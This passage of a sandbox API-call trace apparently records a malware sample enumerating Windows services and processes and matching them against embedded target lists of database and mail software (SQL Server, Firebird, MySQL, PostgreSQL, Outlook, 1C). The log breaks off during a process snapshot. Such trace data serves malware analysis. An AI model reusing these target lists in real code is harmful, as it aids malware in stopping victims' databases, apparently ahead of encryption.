(Heap=0x680000, Flags=0x0, Ptr=0x70c2c0, Size=0x8) returned 0x70c250 [0177.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x3c) returned 0x697480 [0177.894] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x70c250, Size=0x10) returned 0x70c4f0 [0177.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x696360 [0177.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x6961e0 [0177.894] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x70c4f0, Size=0x20) returned 0x6be930 [0177.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x695508 [0177.894] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0177.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6c6298 | out: hHeap=0x680000) returned 1 [0177.894] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0177.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6dc5d8 | out: hHeap=0x680000) returned 1 [0177.894] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6bed68 [0177.895] EnumServicesStatusExW (in: hSCManager=0x6bed68, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 0 [0177.895] GetLastError () returned 0xea [0177.895] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c30) returned 0x6de4a0 [0177.896] EnumServicesStatusExW (in: hSCManager=0x6bed68, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6de4a0, cbBufSize=0x1c30, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6de4a0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 1 [0177.896] CloseServiceHandle (hSCObject=0x6bed68) returned 1 [0177.897] lstrlenW (lpString="Appinfo") returned 7 [0177.897] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0177.897] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0177.897] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0177.897] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0177.897] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0177.897] lstrlenW (lpString="AppXSvc") returned 7 [0177.897] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0177.897] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0177.897] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0177.897] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0177.897] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0177.897] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0177.897] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0177.897] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0177.897] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0177.897] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0177.897] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0177.897] lstrlenW (lpString="Audiosrv") returned 8 [0177.897] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0177.897] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0177.897] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0177.897] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0177.897] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0177.897] lstrlenW (lpString="BFE") returned 3 [0177.897] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0177.898] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0177.898] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0177.898] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0177.898] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0177.898] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0177.898] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0177.898] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0177.898] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0177.898] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0177.898] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0177.898] lstrlenW (lpString="CDPSvc") returned 6 [0177.898] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0177.898] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0177.898] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0177.898] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0177.898] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0177.898] lstrlenW (lpString="ClickToRunSvc") returned 13 [0177.898] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0177.898] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0177.898] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0177.898] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0177.898] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0177.898] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0177.898] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0177.898] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0177.898] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0177.898] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0177.898] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0177.898] lstrlenW (lpString="CryptSvc") returned 8 [0177.899] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0177.899] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0177.899] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0177.899] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0177.899] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0177.899] lstrlenW (lpString="DcomLaunch") returned 10 [0177.899] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0177.899] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0177.899] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0177.899] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0177.899] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0177.899] lstrlenW (lpString="DeviceAssociationService") returned 24 [0177.899] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0177.899] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0177.899] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0177.899] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0177.899] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0177.899] lstrlenW (lpString="Dhcp") returned 4 [0177.899] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0177.899] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0177.899] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0177.899] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0177.899] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0177.899] lstrlenW (lpString="Dnscache") returned 8 [0177.899] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0177.899] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0177.899] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0177.899] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0177.899] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0177.900] lstrlenW (lpString="DPS") returned 3 [0177.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0177.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0177.900] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0177.900] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0177.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0177.900] lstrlenW (lpString="DusmSvc") returned 7 [0177.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0177.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0177.900] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0177.900] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0177.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0177.900] lstrlenW (lpString="EventLog") returned 8 [0177.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0177.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0177.900] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0177.900] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0177.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0177.900] lstrlenW (lpString="EventSystem") returned 11 [0177.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0177.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0177.900] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0177.900] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0177.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0177.900] lstrlenW (lpString="FontCache") returned 9 [0177.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0177.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0177.900] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0177.900] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0177.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0177.901] lstrlenW (lpString="gpsvc") returned 5 [0177.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0177.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0177.901] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0177.901] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0177.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0177.901] lstrlenW (lpString="iphlpsvc") returned 8 [0177.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0177.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0177.901] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0177.901] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0177.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0177.901] lstrlenW (lpString="KeyIso") returned 6 [0177.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0177.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0177.901] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0177.901] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0177.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0177.901] lstrlenW (lpString="LanmanServer") returned 12 [0177.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0177.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0177.901] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0177.901] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0177.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0177.901] lstrlenW (lpString="LanmanWorkstation") returned 17 [0177.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0177.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0177.902] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0177.902] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0177.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0177.902] lstrlenW (lpString="lfsvc") returned 5 [0177.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0177.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0177.902] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0177.902] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0177.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0177.902] lstrlenW (lpString="lmhosts") returned 7 [0177.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0177.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0177.902] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0177.902] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0177.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0177.902] lstrlenW (lpString="LSM") returned 3 [0177.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0177.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0177.902] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0177.902] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0177.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0177.902] lstrlenW (lpString="MpsSvc") returned 6 [0177.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0177.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0177.902] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0177.902] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0177.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0177.903] lstrlenW (lpString="NcbService") returned 10 [0177.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0177.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0177.903] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0177.903] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0177.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0177.903] lstrlenW (lpString="netprofm") returned 8 [0177.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0177.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0177.903] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0177.903] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0177.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0177.903] lstrlenW (lpString="NgcSvc") returned 6 [0177.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0177.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0177.903] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0177.903] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0177.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0177.904] lstrlenW (lpString="NlaSvc") returned 6 [0177.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0177.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0177.904] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0177.904] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0177.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0177.904] lstrlenW (lpString="nsi") returned 3 [0177.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0177.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0177.904] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0177.904] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0177.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0177.904] lstrlenW (lpString="PcaSvc") returned 6 [0177.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0177.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0177.904] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0177.904] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0177.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0177.904] lstrlenW (lpString="PlugPlay") returned 8 [0177.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0177.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0177.905] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0177.905] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0177.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0177.905] lstrlenW (lpString="Power") returned 5 [0177.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0177.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0177.905] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0177.905] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0177.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0177.905] lstrlenW (lpString="ProfSvc") returned 7 [0177.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0177.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0177.905] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0177.905] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0177.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0177.905] lstrlenW (lpString="RpcEptMapper") returned 12 [0177.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0177.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0177.906] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0177.906] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0177.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0177.906] lstrlenW (lpString="RpcSs") returned 5 [0177.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0177.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0177.906] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0177.906] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0177.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0177.906] lstrlenW (lpString="SamSs") returned 5 [0177.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0177.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0177.906] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0177.906] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0177.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0177.906] lstrlenW (lpString="Schedule") returned 8 [0177.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0177.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0177.907] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0177.907] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0177.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0177.907] lstrlenW (lpString="SecurityHealthService") returned 21 [0177.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0177.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0177.907] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0177.907] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0177.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0177.907] lstrlenW (lpString="SENS") returned 4 [0177.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0177.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0177.907] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0177.907] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0177.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0177.907] lstrlenW (lpString="ShellHWDetection") returned 16 [0177.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0177.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0177.907] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0177.907] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0177.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0177.908] lstrlenW (lpString="Spooler") returned 7 [0177.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0177.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0177.908] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0177.908] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0177.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0177.908] lstrlenW (lpString="StateRepository") returned 15 [0177.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0177.974] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0177.974] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0177.974] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0177.974] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0177.974] lstrlenW (lpString="SysMain") returned 7 [0177.974] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0177.974] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0177.974] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0177.974] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0177.974] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0177.974] lstrlenW (lpString="SystemEventsBroker") returned 18 [0177.975] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0177.975] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0177.975] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0177.975] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0177.975] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0177.975] lstrlenW (lpString="Themes") returned 6 [0177.975] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0177.975] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0177.975] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0177.975] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0177.975] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0177.975] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0177.975] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0177.975] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0177.975] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0177.975] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0177.975] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6de4a0 | out: hHeap=0x680000) returned 1 [0177.975] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2f0 [0177.981] Process32FirstW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.981] Process32NextW (in: hSnapshot=0x2f0, 